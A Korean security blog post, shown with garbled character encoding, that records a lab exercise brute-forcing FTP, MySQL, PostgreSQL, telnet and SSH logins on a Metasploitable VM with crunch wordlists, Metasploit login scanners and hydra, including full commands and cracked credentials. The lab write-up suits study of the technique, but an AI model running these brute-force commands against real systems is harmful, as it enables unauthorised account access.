[๋ชจ์˜ ํ•ดํ‚น] Metasploitable์„ ์ด์šฉํ•œ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ

2024. 6. 3. 17:18ยท๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด/๋ชจ์˜ ํ•ดํ‚น
728x90
๋ฐ˜์‘ํ˜•

! ์ด ํฌ์ŠคํŠธ์˜ ๋‚ด์šฉ์€ 2019๋…„ ์ „๊ณต ๊ฐ•์˜์—์„œ ๋‹ค๋ฃฌ ๋ฆฌ๋ˆ…์Šค ๋ณด์•ˆ ์‹ค์Šต์˜ ๊ธฐ๋ก์šฉ์ด๋ฉฐ, ์ด๋Š” ํ•™์Šต ๋ชฉ์ ์œผ๋กœ๋งŒ ์‚ฌ์šฉ๋˜์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

! ์–ด๋– ํ•œ ๊ฒฝ์šฐ์—๋„ ์ด๋Ÿฌํ•œ ๊ธฐ์ˆ ์„ ์•…์šฉํ•˜๊ฑฐ๋‚˜ ๋ถˆ๋ฒ•์ ์ธ ํ™œ๋™์— ์‚ฌ์šฉํ•ด์„œ๋Š” ์•ˆ ๋ฉ๋‹ˆ๋‹ค.

 

! ๋ชจ์˜ ํ•ดํ‚น๊ณผ ๊ด€๋ จ๋œ ์‹ค์Šต์€ ํ•ฉ๋ฒ•์ ์ธ ํ™˜๊ฒฝ์—์„œ๋งŒ ์ˆ˜ํ–‰๋˜์–ด์•ผ ํ•˜๋ฉฐ, ๋ฌด๋‹จ์œผ๋กœ ๋‹ค๋ฅธ ์‚ฌ๋žŒ์˜ ์‹œ์Šคํ…œ์— ์ ‘๊ทผํ•˜๋Š” ๋“ฑ์˜ ํ–‰์œ„๋Š” ๋ฒ•์ ์ธ ๋ฌธ์ œ๋กœ ์ด์–ด์งˆ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๊ธฐ์ˆ ์„ ์‚ฌ์šฉํ•  ๋•Œ์—๋Š” ํ•ญ์ƒ ์œค๋ฆฌ์ ์ธ ์ฑ…์ž„์„ ๊ฐ–๊ณ  ํ–‰๋™ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

 

 

1๏ธโƒฃ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ์ด๋ž€?

๊ฐ€๋Šฅํ•œ ๋ชจ๋“  ์กฐํ•ฉ์˜ ํ‚ค๋‚˜ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์ฒด๊ณ„์ ์œผ๋กœ ์‹œ๋„ํ•˜์—ฌ ์˜ฌ๋ฐ”๋ฅธ ๊ฐ’์„ ์ฐพ์•„๋‚ด๋Š” ๋ฐฉ์‹์ด๋‹ค.

์ด ๊ณต๊ฒฉ์€ ๋‹จ์ˆœํ•˜์ง€๋งŒ, ๊ฐ•๋ ฅํ•œ ์•”ํ˜ธํ™” ๋˜๋Š” ์ถฉ๋ถ„ํžˆ ๊ธด ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๊ฒฝ์šฐ ์‹œ๊ฐ„๊ณผ ์ž์› ๋ฉด์—์„œ ๋น„ํšจ์œจ์ ์ผ ์ˆ˜ ์žˆ๋‹ค.


2๏ธโƒฃ ์‹ค์Šต ํ™˜๊ฒฝ

์‹ค์Šต์—์„œ๋Š” ๋ชจ์˜ ์นจํˆฌ ์—ฐ์Šต์„ ์œ„ํ•ด Metasploitable์„ ์‚ฌ์šฉํ•œ๋‹ค.

Metasploitable์€ ๋ณด์•ˆ ์—ฐ๊ตฌ ๋ฐ ๊ต์œก ๋ชฉ์ ์œผ๋กœ ์‚ฌ์šฉ๋˜๋Š” ์ทจ์•ฝํ•œ ๊ฐ€์ƒ ๋จธ์‹ ์ด๋‹ค. 

Metasploitable์€ ์˜๋„์ ์œผ๋กœ ์—ฌ๋Ÿฌ ๋ณด์•ˆ ์ทจ์•ฝ์ ์„ ํฌํ•จํ•˜๊ณ  ์žˆ์–ด, ์‹ค์ œ ํ™˜๊ฒฝ์—์„œ ํ•ดํ‚น ์—ฐ์Šต์„ ํ•˜๊ณ  ๋ณด์•ˆ ํˆด์„ ํ…Œ์ŠคํŠธํ•˜๋Š” ๋ฐ ์œ ์šฉํ•˜๋‹ค.

 

๐Ÿ”น 1. root ๊ณ„์ • password ์„ค์ •

Metasploitable ์‹คํ–‰ ๋ฐ ๋กœ๊ทธ์ธ
root ๊ณ„์ • password ์„ค์ •


๐Ÿ”น 2. MySQL ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค root ๋น„๋ฐ€๋ฒˆํ˜ธ ๋ณ€๊ฒฝ

~$ mysql -u root -p

> use mysql;
> update user set password=password('1234') where user='root';
> flush privileges;


3๏ธโƒฃ Crunch ๊ธฐ๋Šฅ์„ ์ด์šฉํ•˜์—ฌ ๊ณต๊ฒฉ์šฉ ํŒจ์Šค์›Œ๋“œ ์ž‘์„ฑ

๐Ÿ”น1. charset.lst ํŒŒ์ผ ๋‚ด์šฉ ํ™•์ธํ•˜๊ธฐ

``charset.lst`` ํŒŒ์ผ์€ Crunch์—์„œ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋Š” ๋ฏธ๋ฆฌ ์ •์˜๋œ ๋ฌธ์ž ์„ธํŠธ๋ฅผ ์ €์žฅํ•œ ํŒŒ์ผ์ด๋‹ค. ์ด ํŒŒ์ผ์„ ํ™•์ธํ•˜๋ฉด ํŠน์ • ์–ธ์–ด๋‚˜  ํŒจํ„ด์— ๋งž๋Š” ๋ฌธ์ž ์„ธํŠธ๋ฅผ ์‰ฝ๊ฒŒ ๋ถˆ๋Ÿฌ์™€์„œ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋‹ค.

~# cat /usr/share/crunch/charset.lst

 


๐Ÿ”น2. ํŒจ์Šค์›Œ๋“œ ๋ฆฌ์ŠคํŠธ ์ƒ์„ฑ

  • crunch ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ˆซ์ž๋กœ ๊ตฌ์„ฑ๋œ 1~6์ž๋ฆฌ ๊ธธ์ด์˜ ๋ชจ๋“  ๊ฐ€๋Šฅํ•œ ๋น„๋ฐ€๋ฒˆํ˜ธ ์กฐํ•ฉ์„ ์ƒ์„ฑ
  • ์ƒ์„ฑ ๊ฒฐ๊ณผ๋ฅผ ํŒŒ์ผ๋กœ ์ €์žฅ
  • ํŒŒ์ผ์—๋Š” 0๋ถ€ํ„ฐ 999999๊นŒ์ง€์˜ ๋น„๋ฐ€๋ฒˆํ˜ธ๊ฐ€ ์ €์žฅ ๋จ
~# crunch 1 6 -f /usr/share/crunch/charset.lst numeric -o /root/passwords_6.txt
  • ``crunch 1 6`` → ์ตœ์†Œ 1์ž๋ฆฌ, ์ตœ๋Œ€ 6์ž๋ฆฌ ์กฐํ•ฉ ์ƒ์„ฑ
  • ``-f /usr/share/crunch/charset.lst numeric`` → ์ˆซ์ž(``0123456789``)๋งŒ ์‚ฌ์šฉ
  • ``-o /root/passwords_6.txt`` → ๊ฒฐ๊ณผ๋ฅผ ``/root/passwords_6.txt`` ํŒŒ์ผ์— ์ €์žฅ


๐Ÿ”น2. ํŒจ์Šค์›Œ๋“œ ํŒŒ์ผ์— postgres ํŒจ์Šค์›Œ๋“œ ์ถ”๊ฐ€

  • cat ๋ช…๋ น์–ด๋กœ ํŒจ์Šค์›Œ๋“œ ํŒŒ์ผ์— postgres ํŒจ์Šค์›Œ๋“œ๋ฅผ ์ถ”๊ฐ€ํ•œ๋‹ค.
~# cat >> /root/passwords_6.txt

  • 0๋ถ€ํ„ฐ 999999๊นŒ์ง€ ์ˆซ์ž๋ฅผ ๋ชจ๋‘ ๋Œ€์ž…ํ•˜๊ธฐ์—๋Š” ๋งŽ์€ ์‹œ๊ฐ„์ด ๊ฑธ๋ฆฌ๋ฏ€๋กœ ์—ฌ๊ธฐ์„œ๋Š” ๋น ๋ฅธ ์‹ค์Šต์„ ์œ„ํ•ด ๊ฐ„๋‹จํ•œ ํŒจ์Šค์›Œ๋“œ ํŒŒ์ผ์„ ์ž‘์„ฑํ•œ๋‹ค.


๐Ÿ”น3. ID ๋ฆฌ์ŠคํŠธ ํŒŒ์ผ ์ƒ์„ฑ

  • user.txt๋ผ๋Š” ์ด๋ฆ„์˜ ๊ณต๊ฒฉ ๋Œ€์ƒ ID๊ฐ€ ์ €์žฅ๋œ ํŒŒ์ผ์„ ์ƒ์„ฑํ•œ๋‹ค.


4๏ธโƒฃ Metasploitable FTP ์„œ๋ฒ„ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ (Msfconsole ์ด์šฉ)

  • FTP ๋กœ๊ทธ์ธ ์‹œ๋„๋ฅผ ์ž๋™ํ™”ํ•˜๋Š” ๊ณผ์ •
  • ์Šค์บ๋„ˆ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ฃผ์–ด์ง„ ์‚ฌ์šฉ์ž๋ช…๊ณผ ๋น„๋ฐ€๋ฒˆํ˜ธ ๋ฆฌ์ŠคํŠธ๋ฅผ ํ†ตํ•ด ์ง€์ •๋œ FTP ์„œ๋ฒ„์— ๋Œ€ํ•ด ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ ์ˆ˜ํ–‰ 
> use auxiliary/scanner/ftp/ftp_login

> set rhosts 192.168.255.148
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run
  • ``use auxiliary/scanner/ftp/ftp_login`` : FTP ๋กœ๊ทธ์ธ ์‹œ๋„๋ฅผ ์œ„ํ•œ ์Šค์บ๋„ˆ ๋ชจ๋“ˆ์„ ์„ ํƒ
  • ``set rhosts 192.168.255.148`` : ๊ณต๊ฒฉ ๋Œ€์ƒ IP  ์ฃผ์†Œ๋ฅผ ์„ค์ •
  • ``set user_file /root/users.txt`` : ์•ž์—์„œ ์ƒ์„ฑํ–ˆ๋˜ ๊ณต๊ฒฉ๋Œ€์ƒ ID ๋ฆฌ์ŠคํŠธ๊ฐ€ ํฌํ•จ๋œ ํŒŒ์ผ์˜ ๊ฒฝ๋กœ๋ฅผ ์„ค์ •
  • ``set pass_file /root/password_short.txt`` : ์•ž์—์„œ ์ƒ์„ฑํ–ˆ๋˜ ๋น„๋ฐ€๋ฒˆํ˜ธ ํŒŒ์ผ์˜ ๊ฒฝ๋กœ๋ฅผ ์„ค์ •
  • ``set stop_on_success true`` : ๋กœ๊ทธ์ธ ๊ณต๊ฒฉ์— ์„ฑ๊ณตํ•˜๋ฉด ๊ณต๊ฒฉ์„ ์ค‘์ง€ํ•˜๋„๋ก ์„ค์ •
  • ``set threads 256`` : ์Šค๋ ˆ๋“œ ์ˆ˜ ์„ค์ •
  • ``run`` :์‹คํ–‰

  • ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž…๊ณต๊ฒฉ ์ค‘ ID๋Š” postgres, ํŒจ์Šค์›Œ๋“œ๋Š” postgres๋กœ ๋กœ๊ทธ์ธ์ด ์„ฑ๊ณตํ•˜์—ฌ ์ข…๋ฃŒ๋œ ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค.


5๏ธโƒฃ ๋‹ค๋ฅธ ์„œ๋ฒ„๋“ค ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ

FTP ์„œ๋ฒ„ ์™ธ์—๋„ ๋‹ค๋ฅธ ์„œ๋ฒ„๋“ค๋กœ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž…์„ ํ†ตํ•ด ๊ณต๊ฒฉ์„ ์ˆ˜ํ–‰ํ•ด ๋ณด์•˜๋‹ค.


๐Ÿ”น1. Metasploitable MySQL ์„œ๋ฒ„ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ (Msfconsole ์ด์šฉ)

  • MySQL ์„œ๋ฒ„
  • ๋ช…๋ น์–ด๋Š” ๋™์ผ
  • ์Šค์บ๋„ˆ ๋ชจ๋“ˆ ์„ ํƒ ์‹œ ``mysql/mysql_login`` ๋ชจ๋“ˆ์„ ์„ ํƒํ•˜๊ณ , ``3306``์œผ๋กœ ํฌํŠธ๋ฅผ ์ง€์ •
> use auxiliary/scanner/mysql/mysql_login

> set rhosts 192.168.255.148
> set rport 3306
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run
  • ๋ช…๋ น์–ด ์‹คํ–‰ํ•˜์—ฌ ๊ณต๊ฒฉ ์‹คํ–‰

  • ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž…๊ณต๊ฒฉ ์ค‘ ID๋Š” root, ํŒจ์Šค์›Œ๋“œ๋Š” 1234๋กœ ๋กœ๊ทธ์ธ์ด ์„ฑ๊ณตํ•˜์—ฌ ์ข…๋ฃŒ๋œ ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค.


๐Ÿ”น2. Metasploitable postgreSQL ์„œ๋ฒ„ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ (Msfconsole ์ด์šฉ)

  • postgreSQL ์„œ๋ฒ„
  • ๋ช…๋ น์–ด๋Š” ๋™์ผ
  • ์Šค์บ๋„ˆ ๋ชจ๋“ˆ ์„ ํƒ ์‹œ ``postgres/postgres_login`` ๋ชจ๋“ˆ์„ ์„ ํƒํ•˜๊ณ , ``5432``๋กœ ํฌํŠธ๋ฅผ ์ง€์ •
> use auxiliary/scanner/postgres/postgres_login

> set rhosts 192.168.255.148
> set rport 5432
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run
  • ๋ช…๋ น์–ด ์‹คํ–‰ํ•˜์—ฌ ๊ณต๊ฒฉ ์‹คํ–‰

  • ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž…๊ณต๊ฒฉ ์ค‘ ID๋Š” postgres, ํŒจ์Šค์›Œ๋“œ๋Š” postgres@template1๋กœ ๋กœ๊ทธ์ธ์ด ์„ฑ๊ณตํ•˜์—ฌ ์ข…๋ฃŒ๋œ ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค.


๐Ÿ”น3. Metasploitable telnet ์„œ๋ฒ„ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ (Msfconsole ์ด์šฉ)

  • telnet ์„œ๋ฒ„
  • ๋ช…๋ น์–ด๋Š” ๋™์ผ
  • ์Šค์บ๋„ˆ ๋ชจ๋“ˆ ์„ ํƒ ์‹œ ``telnet/telnet_login`` ๋ชจ๋“ˆ์„ ์„ ํƒ. ํฌํŠธ๋Š” ๊ธฐ๋ณธํฌํŠธ(``23``)๋กœ ์ž๋™์œผ๋กœ ์Šค์บ”๋จ.
> use auxiliary/scanner/telnet/telnet_login

> set rhosts 192.168.255.148
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run
  • ๋ช…๋ น์–ด ์‹คํ–‰ํ•˜์—ฌ ๊ณต๊ฒฉ ์‹คํ–‰

  • ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž…๊ณต๊ฒฉ ์ค‘ ID๋Š” root, ํŒจ์Šค์›Œ๋“œ๋Š” 123456์œผ๋กœ ๋กœ๊ทธ์ธ์ด ์„ฑ๊ณตํ•˜์—ฌ ์ข…๋ฃŒ๋œ ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค.


๐Ÿ”น4. Metasploitable SSH ์„œ๋ฒ„ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ (Msfconsole ์ด์šฉ)

  • SSH ์„œ๋ฒ„
  • ๋ช…๋ น์–ด๋Š” ๋™์ผ
  • ์Šค์บ๋„ˆ ๋ชจ๋“ˆ ์„ ํƒ ์‹œ ``ssh/ssh_login`` ๋ชจ๋“ˆ์„ ์„ ํƒ. ํฌํŠธ๋Š” ๊ธฐ๋ณธํฌํŠธ(``22``)๋กœ ์ž๋™์œผ๋กœ ์Šค์บ”๋จ.
> use auxiliary/scanner/ssh/ssh_login

> set rhosts 192.168.255.148
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run
  • ๋ช…๋ น์–ด ์‹คํ–‰ํ•˜์—ฌ ๊ณต๊ฒฉ ์‹คํ–‰
  • ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž…๊ณต๊ฒฉ ์ค‘ ID๋Š” root, ํŒจ์Šค์›Œ๋“œ๋Š” 123456์œผ๋กœ ๋กœ๊ทธ์ธ์ด ์„ฑ๊ณตํ•˜์—ฌ ์ข…๋ฃŒ๋œ ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค.


๐Ÿ”น5. Metasploitable FTP ์„œ๋ฒ„ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ (hydra ์ด์šฉ)

  • hydra๋ฅผ ์ด์šฉํ•œ FTP ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ
~# hydra -l postgrs -P /root/password_short.txt -f 192.168.255.148 ftp
  • ``-L postgrs``: ์‚ฌ์šฉ์ž ์ด๋ฆ„์„ ํ•˜๋‚˜๋งŒ ์ง€์ •ํ•˜๋Š” ์˜ต์…˜. ``postgres``๋ผ๋Š” ์‚ฌ์šฉ์ž๋ฅผ ๋Œ€์ƒ์œผ๋กœ ๊ณต๊ฒฉ ์ˆ˜ํ–‰.
  • ``-P /root/password_short.txt``: ๋น„๋ฐ€๋ฒˆํ˜ธ ๋ฆฌ์ŠคํŠธ. ์ด ํŒŒ์ผ์— ๋“ค์–ด์žˆ๋Š” ๋น„๋ฐ€๋ฒˆํ˜ธ๋“ค๋กœ ์ˆœ์ฐจ์ ์œผ๋กœ ์‹œ๋„.
  • ``-f```: ์ฒซ ๋ฒˆ์งธ ์„ฑ๊ณต ์‹œ๋„ ํ›„ ๊ณต๊ฒฉ์„ ๋ฉˆ์ถ”๋Š” ์˜ต์…˜ (๋กœ๊ทธ์ธ ์„ฑ๊ณต ์‹œ ์ฆ‰์‹œ ์ข…๋ฃŒ)
  • ``192.168.255.148``: ๊ณต๊ฒฉ ๋Œ€์ƒ IP (Metasploitable ์‹œ์Šคํ…œ)
  • ``ftp``: FTP ํ”„๋กœํ† ์ฝœ์„ ๋Œ€์ƒ์œผ๋กœ ํ•˜๋Š” ๊ณต๊ฒฉ.
  • ๋ช…๋ น์–ด ์‹คํ–‰ํ•˜์—ฌ ๊ณต๊ฒฉ ์‹คํ–‰
  • ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž…๊ณต๊ฒฉ ์ค‘ ID๋Š” postgres, ํŒจ์Šค์›Œ๋“œ๋Š” postgres์œผ๋กœ ๋กœ๊ทธ์ธ์ด ์„ฑ๊ณตํ•˜์—ฌ ์ข…๋ฃŒ๋œ ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค.


๐Ÿ”น6. Metasploitable SSH ์„œ๋ฒ„ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ (hydra ์ด์šฉ)

  • hydra๋ฅผ ์ด์šฉํ•œ SSH ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ
  • ๋ช…๋ น์–ด๋Š” ๋™์ผ
  • ๋งˆ์ง€๋ง‰ ์˜ต์…˜ ``ssh``๋กœ ์ง€์ •
~# hydra -l root -P /root/password_short.txt -f 192.168.255.148 ssh
  • ๋ช…๋ น์–ด ์‹คํ–‰ํ•˜์—ฌ ๊ณต๊ฒฉ ์‹คํ–‰
  • ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž…๊ณต๊ฒฉ ์ค‘ ID๋Š” root, ํŒจ์Šค์›Œ๋“œ๋Š” 123456์œผ๋กœ ๋กœ๊ทธ์ธ์ด ์„ฑ๊ณตํ•˜์—ฌ ์ข…๋ฃŒ๋œ ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค.


๐Ÿ”น7. Metasploitable telnet ์„œ๋ฒ„ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ (hydra ์ด์šฉ)

  • hydra๋ฅผ ์ด์šฉํ•œ SSH ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ
  • ๋ช…๋ น์–ด๋Š” ๋™์ผ
  • ๋งˆ์ง€๋ง‰ ์˜ต์…˜ ``telnet``๋กœ ์ง€์ •
~# hydra -l root -P /root/password_short.txt -f 192.168.255.148 telnet
  • ๋ช…๋ น์–ด ์‹คํ–‰ํ•˜์—ฌ ๊ณต๊ฒฉ ์‹คํ–‰
  • ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž…๊ณต๊ฒฉ ์ค‘ ID๋Š” root, ํŒจ์Šค์›Œ๋“œ๋Š” 123456์œผ๋กœ ๋กœ๊ทธ์ธ์ด ์„ฑ๊ณตํ•˜์—ฌ ์ข…๋ฃŒ๋œ ๊ฒƒ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค.

 

728x90
๋ฐ˜์‘ํ˜•

'๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด > ๋ชจ์˜ ํ•ดํ‚น' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[๋ชจ์˜ํ•ดํ‚น] Windows 2000 ๊ธฐ๋ฐ˜์˜ ์šด์˜์ฒด์ œ ์นจํˆฌํ•˜๊ธฐ  (0) 2025.02.10
[๋ชจ์˜ํ•ดํ‚น] ์œ ๋‹‰์Šค/๋ฆฌ๋ˆ…์Šค ๊ธฐ๋ฐ˜์˜ ์šด์˜์ฒด์ œ ์นจํˆฌ  (0) 2025.02.06
[๋ชจ์˜ ํ•ดํ‚น] ๋ฒ„ํผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ๊ณต๊ฒฉ ์‹ค์Šต  (0) 2024.06.03
[๋ชจ์˜ ํ•ดํ‚น] ์œˆ๋„์šฐ8 ์žฌ๋ถ€ํŒ… ์‹œ ์•…์„ฑ์ฝ”๋“œ ์‹คํ–‰  (0) 2024.03.05
[๋ชจ์˜ ํ•ดํ‚น] ์œˆ๋„์šฐ8/์œˆ๋„์šฐ10 OS ์นจํˆฌ ์ž‘์—…  (0) 2024.03.05
'๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด/๋ชจ์˜ ํ•ดํ‚น' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€
  • [๋ชจ์˜ํ•ดํ‚น] Windows 2000 ๊ธฐ๋ฐ˜์˜ ์šด์˜์ฒด์ œ ์นจํˆฌํ•˜๊ธฐ
  • [๋ชจ์˜ํ•ดํ‚น] ์œ ๋‹‰์Šค/๋ฆฌ๋ˆ…์Šค ๊ธฐ๋ฐ˜์˜ ์šด์˜์ฒด์ œ ์นจํˆฌ
  • [๋ชจ์˜ ํ•ดํ‚น] ๋ฒ„ํผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ๊ณต๊ฒฉ ์‹ค์Šต
  • [๋ชจ์˜ ํ•ดํ‚น] ์œˆ๋„์šฐ8 ์žฌ๋ถ€ํŒ… ์‹œ ์•…์„ฑ์ฝ”๋“œ ์‹คํ–‰
WISHee
WISHee
IT์™€ ๋ณด์•ˆ์— ๋Œ€ํ•œ ๊ณต๋ถ€ ๊ธฐ๋ก์„ ์ฐจ๊ณก์ฐจ๊ณก ์Œ“์•„๊ฐ€๋Š” ๊ธฐ์ˆ  ๋ธ”๋กœ๊ทธ ๐Ÿ›ก๏ธ๐Ÿ’ป
  • WISHee
    DevwithWish
    WISHee
  • ์ „์ฒด
    ์˜ค๋Š˜
    ์–ด์ œ
    • ๐ŸŒณ ROOT (128)
      • โ›“๏ธ ๋„คํŠธ์›Œํฌ ๋ณด์•ˆ (10)
        • ๊ธฐ๋ณธ ๊ฐœ๋… (9)
        • ํŒจํ‚ท ๋ถ„์„ (1)
        • ์นจ์ž… ํƒ์ง€ ๋ฐ ๋ฐฉ์ง€ (0)
      • โš™๏ธ ์‹œ์Šคํ…œ ๋ณด์•ˆ (0)
        • ์šด์˜์ฒด์ œ ๋ณด์•ˆ (0)
        • ์ทจ์•ฝ์  ๋ถ„์„ (0)
        • ๋กœ๊ทธ ๋ถ„์„ (0)
      • ๐ŸŒ ์›น ๋ณด์•ˆ (1)
        • OWASP TOP 10 (1)
        • ์›น ์„œ๋ฒ„ ๋ณด์•ˆ (0)
        • ์›น ์ทจ์•ฝ์  ๋ถ„์„ (0)
      • โ˜๏ธ ํด๋ผ์šฐ๋“œ ๋ณด์•ˆ (3)
        • AWS (3)
      • ๐Ÿ” ์•”ํ˜ธํ™” & ์ธ์ฆ (3)
        • ์•”ํ˜ธํ™” ๊ฐœ๋… (2)
        • TLS,SSL (0)
        • ์ธ์ฆ & ์ ‘๊ทผ์ œ์–ด (1)
      • ๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด (30)
        • ๋ณด์•ˆ ๊ด€์ œ (14)
        • ๋ชจ์˜ ํ•ดํ‚น (12)
        • ์ทจ์•ฝ์  ์ง„๋‹จ (3)
        • ๋””์ง€ํ„ธํฌ๋ Œ์‹ (1)
      • ๐Ÿ“š ISMS & ISO27001 (9)
        • ISMS, ISMS-P ์ธ์ฆ (2)
      • ๐Ÿ“ฐ ๋ณด์•ˆ ๋‰ด์Šค & ํŠธ๋ Œ๋“œ (1)
        • ์ตœ์‹  ๋ณด์•ˆ ์ด์Šˆ (1)
        • ์‚ฌ์ด๋ฒ„ ์œ„ํ˜‘ ์ •๋ณด (0)
        • ๋ณด์•ˆ ์ปจํผ๋Ÿฐ์Šค ๋ฆฌ๋ทฐ (0)
      • ๐Ÿ”ฅ SKShieldusRookies (15)
        • Review (3)
        • PBL (0)
        • ๊ณผ์ œ (4)
        • ๋ชจ๋“ˆ ํ”„๋กœ์ ํŠธ (8)
        • ์ตœ์ข… ํ”„๋กœ์ ํŠธ (0)
      • ๐Ÿ—‚๏ธ Project (3)
        • SOAR (0)
        • BlockChain (3)
      • ๐Ÿงฉ Language (23)
        • Java (1)
        • Python (16)
        • Programmers (6)
      • ๐Ÿ‘ฅ ๋ฒ„์ „๊ด€๋ฆฌ & ํ˜‘์—…๋„๊ตฌ (9)
        • Git, GitHub (4)
        • etc (5)
      • ๐Ÿ’œ ์ผ์ƒ (21)
        • Boot Camp (4)
        • Study (6)
        • Travel (8)
        • Study Abroad (3)
  • ๋ธ”๋กœ๊ทธ ๋ฉ”๋‰ด

    • ํ™ˆ
    • ํƒœ๊ทธ
    • ๋ฐฉ๋ช…๋ก
  • ๋งํฌ

    • GitHub
  • ๊ณต์ง€์‚ฌํ•ญ

    • ๋ฐ˜๊ฐ‘์Šต๋‹ˆ๋‹ค!
  • ์ธ๊ธฐ ๊ธ€

  • ํƒœ๊ทธ

    Python
    ํ”Œ๋ผ์Šคํฌ
    ํ•ด์™ธ์—ฌํ–‰
    ๋ณด์•ˆ์‹ค์Šต
    sk์‰ด๋”์Šค๋ฃจํ‚ค์ฆˆ
    git
    ๊นƒํ—ˆ๋ธŒ
    flask
    VSCode
    ํ•œ๋‹ฌ์—ฌํ–‰
    ํŒŒ๋ฆฌ์—ฌํ–‰
    ์œ ๋Ÿฝ์—ฌํ–‰
    ์นผ๋ฆฌ๋ฆฌ๋ˆ…์Šค
    Github
    ํ”„๋ž‘์Šค์—ฌํ–‰
    ์ฝ”๋”ฉํ…Œ์ŠคํŠธ
    ์™€์ด์–ด์ƒคํฌ
    ์˜นํ”Œ๋ขฐ๋ฅด
    ๋ธ”๋ก์ฒด์ธ์‹ค์Šต
    ๋Ÿฐ๋˜์—ฌํ–‰
    ์œ ๋Ÿฝํ•œ๋‹ฌ์—ฌํ–‰
    ๋ชฝ์ƒ๋ฏธ์…ธ
    ์ •๋ณด๋ณด์•ˆ
    ํ”„๋กœ๊ทธ๋ž˜๋จธ์Šค
    ๋ชจ์˜ํ•ดํ‚น
    ํŒŒ์ด์ฌ
    ํ˜‘์—…๋„๊ตฌ
    slack
    ์œˆ๋„์šฐ๋ณด์•ˆ
    ๋ฆฌ๋ˆ…์Šค๋ณด์•ˆ
  • ์ตœ๊ทผ ๋Œ“๊ธ€

  • ์ตœ๊ทผ ๊ธ€

  • 160x600
    250x250
  • hELLOยท Designed By์ •์ƒ์šฐ.v4.10.3
WISHee
[๋ชจ์˜ ํ•ดํ‚น] Metasploitable์„ ์ด์šฉํ•œ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ
์ƒ๋‹จ์œผ๋กœ

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”